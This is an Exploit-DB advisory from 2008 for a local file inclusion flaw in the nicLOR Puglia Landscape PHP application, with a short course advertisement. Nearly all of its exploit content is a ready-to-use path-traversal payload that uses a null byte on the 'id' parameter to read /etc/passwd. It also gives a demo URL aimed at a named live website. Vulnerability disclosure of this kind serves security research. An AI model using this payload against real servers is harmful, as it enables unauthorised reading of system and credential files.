nicLOR Puglia Landscape - Local File Inclusion

EDB-ID:

6979


Author:

StAkeR

Type:

webapps


Platform:

PHP

Date:

2008-11-04


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

/*
   ---------------------------------------------------
   Puglia_Landscape Local File Inclusion Vulnerability
   ---------------------------------------------------
   Discovered By StAkeR[at]hotmail[dot]it
   http://www.niclor.net/prodotti/Puglia_Landscape
   ---------------------------------------------------
   
   * Local File Inclusion
   * Note: Magic_Quotes_GPC Off
   
   - index.php?id=../../../../../../../[Local File and NullByte]
   - index.php?id=../../../../../../../etc/passwd%00
   
   * Demo
   - http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
 
   

*/

# milw0rm.com [2008-11-04]